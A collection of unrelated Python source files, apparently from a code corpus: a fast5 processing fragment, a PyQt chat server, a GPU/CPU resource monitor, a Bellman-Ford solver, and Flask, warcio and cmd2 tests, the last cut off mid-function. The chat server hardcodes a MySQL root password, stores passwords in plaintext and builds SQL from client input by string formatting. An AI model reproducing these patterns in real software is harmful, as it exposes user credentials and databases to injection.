BAMIN_DIR = os.path.abspath(BAMIN_DIR)
FAST5IN_DIR = os.path.abspath(FAST5IN_DIR)
OUT_DIR = os.path.abspath(OUT_DIR)
FAST5singleIN_DIR = os.path.abspath(FAST5singleIN_DIR)
single_fast5_count = 0
dirs = []
for directory in (os.path.join(FAST5singleIN_DIR, x) for x in os.listdir(FAST5singleIN_DIR) if os.path.isdir(os.path.join(FAST5singleIN_DIR, x))):
dirs.append(directory)
fast5s = [os.path.join(directory, x) for x in os.listdir(directory) if x.endswith('.fast5')]
single_fast5_count += len(fast5s)
dirs.sort()
print('This is the amount of single fast5s %s' % single_fast5_count)
print(len(dirs))
#for i in range(len(dirs)):
#p = Process(target=fast5s_to_fastq, args=(dirs[0]))
#p.start()
#p.join()
#exit()
# with Pool(processes=n_threads) as pool:
#pool.map(fast5s_to_fastq, dirs)
exit()
while dirs:
with Pool(processes=n_threads) as pool:
pool.map(fast5s_to_fastq, dirs)
for dir_ in (os.path.join(FAST5singleIN_DIR, x) for x in os.listdir(FAST5singleIN_DIR) if os.path.isdir(os.path.join(FAST5singleIN_DIR, x))):
if os.path.exists(os.path.join(os.path.join(dir_), os.path.basename(dir_) + '.fastq')):
dirs.remove(dir_)
print('So many dirs to go %s' % len(dirs))
exit()
for x in (Parallel(n_jobs=n_threads)(delayed(fast5s_to_fastq)(x) for x in dirs)):
print(x)
|
Server.py
|
'''
author: ywxk
target: implement the chat server features
2017.11.14
'''
import sys
import time
import socket
import pymysql
import threading
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
addr = ("127.0.0.1", 3300)
class Link:
# TCP initialization and shared state
onlines = 0
usersname = []  # names of users currently online
userssock = {}  # sockets of online users, keyed by name
def __init__(self, addr, db):
self.db = db
self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow address reuse
self.sk.bind(addr)
self.sk.listen(1000)
self.isrun = True  # thread control flag
t = threading.Thread(target=self.LoopListen)
t.start()
# Listener thread
def LoopListen(self):
print('Listening...')
while self.isrun:
sock, addr = self.sk.accept()
t = threading.Thread(target=self.line, args=(sock, addr))
t.start()
# Per-client worker thread
def line(self, sock, addr):
while self.isrun:
try:
data = sock.recv(1024).decode('utf-8')
# Check whether the client is going offline
if data == '$$END$$':
self.offline()
break
# Handle user account info (login / registration)
elif data.find('$$INFO') != -1:
print('Client sent user info')
self.dealinfo(data, sock)
# Forward a chat message
else:
dataitem = data.split('$')
name1 = dataitem[0]
name2 = dataitem[1]
mess = dataitem[2]
print(name2 + ' to ' + name1 + ': ' + mess)
self.userssock[name1].send(data.encode('utf-8'))
except:
print('Error while exchanging messages')
self.offline()
break
def dealinfo(self, data, sock):
info = data.split(',')
name = info[1]
keyword = info[2]
aim = info[3]
if aim == 'Login':
if name in self.usersname:
sock.send('$$USERAT'.encode('utf-8'))
print('User is already online elsewhere')
return False
if name not in self.db.namekey:
sock.send('$$UNREG'.encode('utf-8'))
print('This user is not registered')
return False
if keyword != self.db.namekey[name]:
sock.send('$$KEYERR'.encode('utf-8'))
print('Password does not match')
return False
elif aim == 'Regis':
if name in self.db.namekey:
sock.send('$$USERAT'.encode('utf-8'))
print('This user name already exists')
return False
else:
userdata = (name, keyword, 'None')
print('Writing to database...')
self.db.insert_datarow(userdata)
print('Database write succeeded')
# Handle coming online
self.online(name, sock)
return True
# Handle a user going offline
def offline(self):
if self.onlines != 0:
self.onlines -= 1
name = self.usersname.pop()
print('%s has gone offline' % name)
self.userssock.pop(name)  # update the online list
# notify the remaining clients to remove this user
data = '$$DEL:' + name
for user in self.usersname:
self.userssock[user].send(data.encode('utf-8'))
# Handle a user coming online
def online(self, name, sock):
self.onlines += 1
data = '$$ADD:' + name  # notify the other clients to add this user
for user in self.usersname:
self.userssock[user].send(data.encode('utf-8'))
print(name + ' is now online')
self.namelist_send(sock)
self.usersname.append(name)
self.userssock[name] = sock
# Send the list of online users
def namelist_send(self, sock):
print('Sending the online user list')
sock.send('$$LIST'.encode('utf-8'))
for item in self.usersname:
print('Sending: ' + item)
sock.send(str(item).encode('utf-8'))
time.sleep(0.01)
sock.send('$$END'.encode('utf-8'))
# Database access
class Database:
namekey = {}
# Connect to the database
def __init__(self):
self.db = pymysql.connect(host='127.0.0.1', port=3306,
user='root', passwd='ywxkgdw', db='chat')
self.cursor = self.db.cursor()
self.regrenew()
def get_table_data(self):
self.cursor.execute('SELECT * FROM users')
results = self.cursor.fetchall()
self.db.commit()
return results
def insert_datarow(self, datalist):
sql = 'insert into users values(1,"%s","%s","%s")'
self.cursor.execute(sql % datalist)
self.db.commit()
self.namekey[datalist[0]] = datalist[1]
def regrenew(self):
listdata = self.get_table_data()
for data in listdata:
self.namekey[data[1]] = data[2]
return self.namekey
# Main window
class Box(QWidget):
def __init__(self):
super().__init__()
self.BoxInit()
# Initialize the window
def BoxInit(self):
self.resize(700, 500)
self.setFixedSize(self.width(), self.height())
self.setWindowTitle('Vortex Host')
# Set up the table and buttons
grid = QGridLayout()
self.delbtn = QPushButton('Delete')
self.fixbtn = QPushButton('Modify')
self.listview = QTableWidget(0, 4)
self.listview.setHorizontalHeaderLabels(
['ID', 'Name', 'KeyWord', 'IP'])
self.listview.horizontalHeader().setStretchLastSection(True)  # stretch the last column to fit the window
grid.addWidget(self.listview, 0, 0, 1, 2)
grid.addWidget(self.delbtn, 1, 0)
grid.addWidget(self.fixbtn, 1, 1)
self.setLayout(grid)
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
self.show()
# Populate the online-user table
def listview_init(self, listdata):
self.listrow = 0
for row in listdata:
self.listview.setRowCount(self.listrow + 1)
for item in range(4):
newItem = QTableWidgetItem(str(row[item]))
self.listview.setItem(self.listrow, item, newItem)
self.listrow += 1
# Append one row to the display
def add_datarow(self, listdata):
self.listview.setRowCount(self.listrow + 1)
for item in range(4):
newItem = QTableWidgetItem(str(listdata[item]))
self.listview.setItem(self.listrow, item, newItem)
self.listrow += 1
# Remove one row from the display
def sub_datarow(self, listdata):
pass
# Main entry point
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Box()
dbdata = Database()
link = Link(addr, dbdata)
results = dbdata.get_table_data()
ex.listview_init(results)
sys.exit(app.exec_())
|
resource_monitor.py
|
# Copyright (c) Peng Cheng Laboratory
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import argparse
import time
import multiprocessing
import psutil
import os
#run_time = 24
net_interval = 30
dev_interval = 30
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--id',type=str,required = True,help="experiment id")
return parser.parse_args()
def test_record_device_info(experiment_id):
count = 0
while True:
count+=1
with open('/root/' + experiment_id,'a+') as f:
f.write(str(count)+'\n')
time.sleep(2)
def record_net_info():
u_before = psutil.net_io_counters().bytes_sent
d_before = psutil.net_io_counters().bytes_recv
def get_send(u_before):
u_now = psutil.net_io_counters().bytes_sent
upload = (u_now - u_before)
u_before = u_now
return upload,u_before
def get_recv(d_before):
d_now = psutil.net_io_counters().bytes_recv
download = (d_now - d_before)
d_before = d_now
return download,d_before
#while((time.time() - start_time)/3600 < run_time):
while True:
upload,u_before = get_send(u_before)
download,d_before = get_recv(d_before)
f=open(log_path + '/net_info.csv','a+')
f.write(str(upload) + ',' + str(download) + '\n')
f.close()
time.sleep(net_interval)
def write_file(path,content):
record_file = open(path,'a+')
record_file.write(content + '\n')
record_file.close()
def record_device_info():
#while((time.time() - start_time)/3600 < run_time):
while True:
cpu_core_context =str(psutil.cpu_percent(interval=1, percpu=True))
write_file(log_path + '/cpu_core_info.csv',cpu_core_context)
cpu = os.popen("export TERM=linux && top -bn 1|grep Cpu\(s\)|awk '{print $2}'").readline().strip()
write_file(log_path + '/cpu_info.csv',cpu)
mem = psutil.virtual_memory()
write_file(log_path + '/mem_info.csv',str(mem.used/1024/1024)) #M
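# Sample per-GPU utilization with `nvidia-smi dmon` and append one CSV line
# (sm and mem utilization) per GPU, using the GPU index as the file name.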
gpu = os.popen("nvidia-smi dmon -c 1 -s u|awk '{if($1 ~ /^[0-9]+$/){print $1,$2,$3}}'").readlines()
for i in gpu:
file_name = str(i.strip().split(' ')[0]) + '.csv'
content = str(','.join((i.strip().split(' ')[1],i.strip().split(' ')[2])))
write_file(log_path + '/' + file_name,content)
time.sleep(dev_interval)
def socket_client(s, server_ip):
try:
while True:
print(server_ip)
s.sendto(b'give me experment id', (server_ip, 7777))
ping = s.recv(1024).decode('utf-8')
time.sleep(5)
except Exception as e:
s.close()
print(e)
dev_p.terminate()  # stop the monitoring child processes before exiting
net_p.terminate()
exit(1)
if __name__ == "__main__":
args = get_args()
experiment_id = args.id
log_path = '/root/mountdir/device_info/' + experiment_id + '/' + os.environ['SLURMD_NODENAME']
if not os.path.isdir(log_path):
os.makedirs(log_path)
start_date = os.popen('date').readline().strip()
write_file(log_path + '/time',start_date)
start_time = time.time()
dev_p = multiprocessing.Process(target=record_device_info)
dev_p.start()
net_p = multiprocessing.Process(target = record_net_info)
net_p.start()
dev_p.join()
net_p.join()
|
lab11_e.py
|
from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(3 * 67108864)
def main():
inf = 10 ** 9
#Ford-Bellman algo https://e-maxx.ru/algo/negative_cycle
file_input, file_output = open('negcycle.in', 'r'), open('negcycle.out','w')
n = int(file_input.readline())
weight_map, matrix, negcycle = [0] * n, [], [None] * n
for i in range(n):
current = list(map(int, file_input.readline().split()))
# concurrent = []
for j in range(n):
if current[j] != inf: matrix.append([i, j, current[j]])
# matrix[i] = concurrent
# del concurrent
flag = None
for i in range(n):
for j in range(len(matrix)):
if weight_map[matrix[j][1]] > matrix[j][2] + weight_map[matrix[j][0]]:
negcycle[matrix[j][1]], flag = matrix[j][:2]
weight_map[matrix[j][1]] = matrix[j][2] + weight_map[matrix[j][0]]
if flag is None: break
if flag is not None:
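# Walk n parent links from the last relaxed vertex; after n steps we are guaranteed
# to land on a vertex inside the negative cycle, so the cycle can then be read off
# by following the parent pointers until the starting vertex reappears.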
all_flag = flag
for _ in range(n): all_flag = negcycle[all_flag]
all_negcycle = []
iter = all_flag
while 1:
all_negcycle.append(iter)
iter = negcycle[iter]
if all_flag == iter: break
all_negcycle.append(all_flag)
all_negcycle = all_negcycle[::-1]
print('YES', len(all_negcycle), sep = '\n', file=file_output)
print(*[vertex + 1 for vertex in all_negcycle], file=file_output)
else: print('NO', file=file_output)
file_output.close()
thread = threading.Thread(target=main)
thread.start()
|
__init__.py
|
from __future__ import unicode_literals
import threading
import logging
from functools import wraps
from tests import TestCase as BaseTestCase
from werkzeug.serving import make_server
from flask import g, session, redirect
from catsnap.web import app
from nose.tools import nottest
from splinter import Browser
from splinter.exceptions import ElementDoesNotExist
from selenium.webdriver.remote.remote_connection import LOGGER
web_actors = {}
class TestCase(BaseTestCase):
def setUp(self):
super(TestCase, self).setUp()
self.browser = web_actors['browser']
def tearDown(self):
try:
self.visit_url('/logout')
finally:
super(TestCase, self).tearDown()
def visit_url(self, path):
self.browser.visit('http://localhost:65432' + path)
class App(object):
def __init__(self):
self.app = app
def start(self):
self.server = make_server('0.0.0.0', 65432, self.app)
self.server.serve_forever()
def stop(self):
if hasattr(self, 'server'):
self.server.shutdown()
def setUpPackage():
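# Start the Flask app in a background daemon thread and launch a shared splinter
# Browser; both are stored in web_actors so test cases and teardown can reach them.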
test_app = App()
thread = threading.Thread(target=test_app.start)
thread.daemon = True
thread.start()
web_actors['server'] = test_app
web_actors['browser'] = Browser()
LOGGER.setLevel(logging.WARNING)
def tearDownPackage():
web_actors['browser'].quit()
web_actors['server'].stop()
@nottest
@app.route('/become_logged_in')
def become_logged_in():
g.user = 1
session['logged_in'] = True
return redirect('/')
@nottest
@app.before_request
def indicate_test_server():
g.test_server = True
@nottest
def logged_in(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
web_actors['browser'].visit('http://localhost:65432/become_logged_in')
fn(*args, **kwargs)
return wrapper
|
test_capture_http_proxy.py
|
from warcio.capture_http import capture_http
import threading
from wsgiref.simple_server import make_server, WSGIServer
import time
import requests
from warcio.archiveiterator import ArchiveIterator
from pytest import raises
# ==================================================================
class TestCaptureHttpProxy():
def setup(cls):
def app(env, start_response):
result = ('Proxied: ' + env['PATH_INFO']).encode('utf-8')
headers = [('Content-Length', str(len(result)))]
start_response('200 OK', headers=headers)
return iter([result])
from wsgiprox.wsgiprox import WSGIProxMiddleware
wsgiprox = WSGIProxMiddleware(app, '/')
class NoLogServer(WSGIServer):
def handle_error(self, request, client_address):
pass
server = make_server('localhost', 0, wsgiprox, server_class=NoLogServer)
addr, cls.port = server.socket.getsockname()
cls.proxies = {'https': 'localhost:' + str(cls.port),
'http': 'localhost:' + str(cls.port)
}
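# Route both http and https requests through the local wsgiprox server; passing
# port 0 to make_server above lets the OS pick a free port, which is read back
# from the server socket.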
def run():
try:
server.serve_forever()
except Exception as e:
print(e)
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.1)
def test_capture_http_proxy(self):
with capture_http() as warc_writer:
res = requests.get("http://example.com/test", proxies=self.proxies, verify=False)
ai = ArchiveIterator(warc_writer.get_stream())
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "http://example.com/test"
assert response.content_stream().read().decode('utf-8') == 'Proxied: /http://example.com/test'
assert response.rec_headers['WARC-Proxy-Host'] == 'http://localhost:{0}'.format(self.port)
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "http://example.com/test"
assert request.rec_headers['WARC-Proxy-Host'] == 'http://localhost:{0}'.format(self.port)
with raises(StopIteration):
assert next(ai)
def test_capture_https_proxy(self):
with capture_http() as warc_writer:
res = requests.get("https://example.com/test", proxies=self.proxies, verify=False)
res = requests.get("https://example.com/foo", proxies=self.proxies, verify=False)
# not recording this request
res = requests.get("https://example.com/skip", proxies=self.proxies, verify=False)
with capture_http(warc_writer):
res = requests.get("https://example.com/bar", proxies=self.proxies, verify=False)
ai = ArchiveIterator(warc_writer.get_stream())
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/test'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/foo'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/bar"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/bar'
request = next(ai)
assert request.rec_type == 'request'
with raises(StopIteration):
assert next(ai)
def test_capture_https_proxy_same_session(self):
sesh = requests.session()
with capture_http() as warc_writer:
res = sesh.get("https://example.com/test", proxies=self.proxies, verify=False)
res = sesh.get("https://example.com/foo", proxies=self.proxies, verify=False)
# *will* be captured, as part of same session... (fix this?)
res = sesh.get("https://example.com/skip", proxies=self.proxies, verify=False)
with capture_http(warc_writer):
res = sesh.get("https://example.com/bar", proxies=self.proxies, verify=False)
ai = ArchiveIterator(warc_writer.get_stream())
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/test'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/foo'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/skip"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/skip'
request = next(ai)
assert request.rec_type == 'request'
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/bar"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/bar'
request = next(ai)
assert request.rec_type == 'request'
with raises(StopIteration):
assert next(ai)
|
test_cmd2.py
|
# coding=utf-8
# flake8: noqa E302
"""
Cmd2 unit/functional testing
"""
import argparse
import builtins
import io
import os
import sys
import tempfile
from code import InteractiveConsole
import pytest
# Python 3.5 had some regressions in the unittest.mock module, so use 3rd party mock if available
try:
import mock
except ImportError:
from unittest import mock
import cmd2
from cmd2 import ansi, clipboard, constants, plugin, utils, COMMAND_NAME
from .conftest import run_cmd, normalize, verify_help_text, HELP_HISTORY
from .conftest import SHORTCUTS_TXT, SHOW_TXT, SHOW_LONG, complete_tester
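# Build a cmd2 app whose stdout is wrapped in StdSim so tests can capture and
# inspect everything the app prints.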
def CreateOutsimApp():
c = cmd2.Cmd()
c.stdout = utils.StdSim(c.stdout)
return c
@pytest.fixture
def outsim_app():
return CreateOutsimApp()
def test_version(base_app):
assert cmd2.__version__
def test_not_in_main_thread(base_app, capsys):
import threading
cli_thread = threading.Thread(name='cli_thread', target=base_app.cmdloop)
cli_thread.start()
cli_thread.join()
out, err = capsys.readouterr()
assert "cmdloop must be run in the main thread" in err
def test_empty_statement(base_app):
out, err = run_cmd(base_app, '')
expected = normalize('')
assert out == expected
def test_base_help(base_app):
out, err = run_cmd(base_app, 'help')
verify_help_text(base_app, out)
def test_base_help_verbose(base_app):
out, err = run_cmd(base_app, 'help -v')
verify_help_text(base_app, out)
# Make sure :param type lines are filtered out of help summary
help_doc = base_app.do_help.__func__.__doc__
help_doc += "\n:param fake param"
base_app.do_help.__func__.__doc__ = help_doc
out, err = run_cmd(base_app, 'help --verbose')
verify_help_text(base_app, out)
assert ':param' not in ''.join(out)
def test_base_argparse_help(base_app):
# Verify that "set -h" gives the same output as "help set" and that it starts in a way that makes sense
out1, err1 = run_cmd(base_app, 'set -h')
out2, err2 = run_cmd(base_app, 'help set')
assert out1 == out2
assert out1[0].startswith('Usage: set')
assert out1[1] == ''
assert out1[2].startswith('Set a settable parameter')
def test_base_invalid_option(base_app):
out, err = run_cmd(base_app, 'set -z')
assert err[0] == 'Usage: set [-h] [-a] [-l] [param] [value]'
assert 'Error: unrecognized arguments: -z' in err[1]
def test_base_shortcuts(base_app):
out, err = run_cmd(base_app, 'shortcuts')
expected = normalize(SHORTCUTS_TXT)
assert out == expected
def test_command_starts_with_shortcut():
with pytest.raises(ValueError) as excinfo:
app = cmd2.Cmd(shortcuts={'help': 'fake'})
assert "Invalid command name 'help'" in str(excinfo.value)
def test_base_show(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set')
expected = normalize(SHOW_TXT)
assert out == expected
def test_base_show_long(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set -l')
expected = normalize(SHOW_LONG)
assert out == expected
def test_base_show_readonly(base_app):
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set -a')
expected = normalize(SHOW_TXT + '\nRead only settings:' + """
Commands may be terminated with: {}
Output redirection and pipes allowed: {}
""".format(base_app.statement_parser.terminators, base_app.allow_redirection))
assert out == expected
def test_cast():
# Boolean
assert utils.cast(True, True) == True
assert utils.cast(True, False) == False
assert utils.cast(True, 0) == False
assert utils.cast(True, 1) == True
assert utils.cast(True, 'on') == True
assert utils.cast(True, 'off') == False
assert utils.cast(True, 'ON') == True
assert utils.cast(True, 'OFF') == False
assert utils.cast(True, 'y') == True
assert utils.cast(True, 'n') == False
assert utils.cast(True, 't') == True
assert utils.cast(True, 'f') == False
# Non-boolean same type
assert utils.cast(1, 5) == 5
assert utils.cast(3.4, 2.7) == 2.7
assert utils.cast('foo', 'bar') == 'bar'
assert utils.cast([1,2], [3,4]) == [3,4]
def test_cast_problems(capsys):
expected = 'Problem setting parameter (now {}) to {}; incorrect type?\n'
# Boolean current, with new value not convertible to bool
current = True
new = [True, True]
assert utils.cast(current, new) == current
out, err = capsys.readouterr()
assert out == expected.format(current, new)
# Non-boolean current, with new value not convertible to current type
current = 1
new = 'octopus'
assert utils.cast(current, new) == current
out, err = capsys.readouterr()
assert out == expected.format(current, new)
def test_base_set(base_app):
out, err = run_cmd(base_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
""")
assert out == expected
out, err = run_cmd(base_app, 'set quiet')
assert out == ['quiet: True']
def test_set_not_supported(base_app):
out, err = run_cmd(base_app, 'set qqq True')
expected = normalize("""
Parameter 'qqq' not supported (type 'set' for list of parameters).
""")
assert err == expected
def test_set_quiet(base_app):
out, err = run_cmd(base_app, 'set quie True')
expected = normalize("""
quiet - was: False
now: True
""")
assert out == expected
out, err = run_cmd(base_app, 'set quiet')
assert out == ['quiet: True']
@pytest.mark.parametrize('new_val, is_valid, expected', [
(ansi.ANSI_NEVER, False, ansi.ANSI_NEVER),
('neVeR', False, ansi.ANSI_NEVER),
(ansi.ANSI_TERMINAL, False, ansi.ANSI_TERMINAL),
('TeRMInal', False, ansi.ANSI_TERMINAL),
(ansi.ANSI_ALWAYS, False, ansi.ANSI_ALWAYS),
('AlWaYs', False, ansi.ANSI_ALWAYS),
('invalid', True, ansi.ANSI_TERMINAL),
])
def test_set_allow_ansi(base_app, new_val, is_valid, expected):
# Initialize allow_ansi for this test
ansi.allow_ansi = ansi.ANSI_TERMINAL
# Use the set command to alter it
out, err = run_cmd(base_app, 'set allow_ansi {}'.format(new_val))
# Verify the results
assert bool(err) == is_valid
assert ansi.allow_ansi == expected
# Reload ansi module to reset allow_ansi to its default since it's an
# application-wide setting that can affect other unit tests.
import importlib
importlib.reload(ansi)
class OnChangeHookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _onchange_quiet(self, old, new) -> None:
"""Runs when quiet is changed via set command"""
self.poutput("You changed quiet")
@pytest.fixture
def onchange_app():
app = OnChangeHookApp()
return app
def test_set_onchange_hook(onchange_app):
out, err = run_cmd(onchange_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
You changed quiet
""")
assert out == expected
def test_base_shell(base_app, monkeypatch):
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, 'shell echo a')
assert out == []
assert m.called
def test_base_py(base_app):
# Create a variable and make sure we can see it
out, err = run_cmd(base_app, 'py qqq=3')
assert not out
out, err = run_cmd(base_app, 'py print(qqq)')
assert out[0].rstrip() == '3'
# Add a more complex statement
out, err = run_cmd(base_app, 'py print("spaces" + " in this " + "command")')
assert out[0].rstrip() == 'spaces in this command'
# Set locals_in_py to True and make sure we see self
out, err = run_cmd(base_app, 'set locals_in_py True')
assert 'now: True' in out
out, err = run_cmd(base_app, 'py print(self)')
assert 'cmd2.cmd2.Cmd object' in out[0]
# Set locals_in_py to False and make sure we can't see self
out, err = run_cmd(base_app, 'set locals_in_py False')
assert 'now: False' in out
out, err = run_cmd(base_app, 'py print(self)')
assert "NameError: name 'self' is not defined" in err
def test_base_error(base_app):
out, err = run_cmd(base_app, 'meow')
assert "is not a recognized command" in err[0]
def test_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_with_empty_args(base_app):
out, err = run_cmd(base_app, 'run_script')
assert "the following arguments are required" in err[1]
def test_run_script_with_nonexistent_file(base_app, capsys):
out, err = run_cmd(base_app, 'run_script does_not_exist.txt')
assert "does not exist" in err[0]
def test_run_script_with_directory(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
out, err = run_cmd(base_app, 'run_script {}'.format(test_dir))
assert "is not a file" in err[0]
def test_run_script_with_empty_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'empty.txt')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert not out and not err
def test_run_script_with_binary_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'binary.bin')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "is not an ASCII or UTF-8 encoded text file" in err[0]
def test_run_script_with_python_file(base_app, request):
m = mock.MagicMock(name='input', return_value='2')
builtins.input = m
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'pyscript', 'stop.py')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "appears to be a Python file" in err[0]
def test_run_script_with_utf8_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'utf8.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_nested_run_scripts(base_app, request):
# Verify that running a script with nested run_script commands works correctly,
# and runs the nested script commands in the correct order.
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'nested.txt')
# Run the top level script
initial_run = 'run_script ' + filename
run_cmd(base_app, initial_run)
# Check that the right commands were executed.
expected = """
%s
_relative_run_script precmds.txt
set allow_ansi Always
help
shortcuts
_relative_run_script postcmds.txt
set allow_ansi Never""" % initial_run
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_runcmds_plus_hooks(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
prefilepath = os.path.join(test_dir, 'scripts', 'precmds.txt')
postfilepath = os.path.join(test_dir, 'scripts', 'postcmds.txt')
base_app.runcmds_plus_hooks(['run_script ' + prefilepath,
'help',
'shortcuts',
'run_script ' + postfilepath])
expected = """
run_script %s
set allow_ansi Always
help
shortcuts
run_script %s
set allow_ansi Never""" % (prefilepath, postfilepath)
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_relative_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_relative_run_script_with_odd_file_names(base_app, monkeypatch):
"""Test file names with various patterns"""
# Mock out the do_run_script call to see what args are passed to it
run_script_mock = mock.MagicMock(name='do_run_script')
monkeypatch.setattr("cmd2.Cmd.do_run_script", run_script_mock)
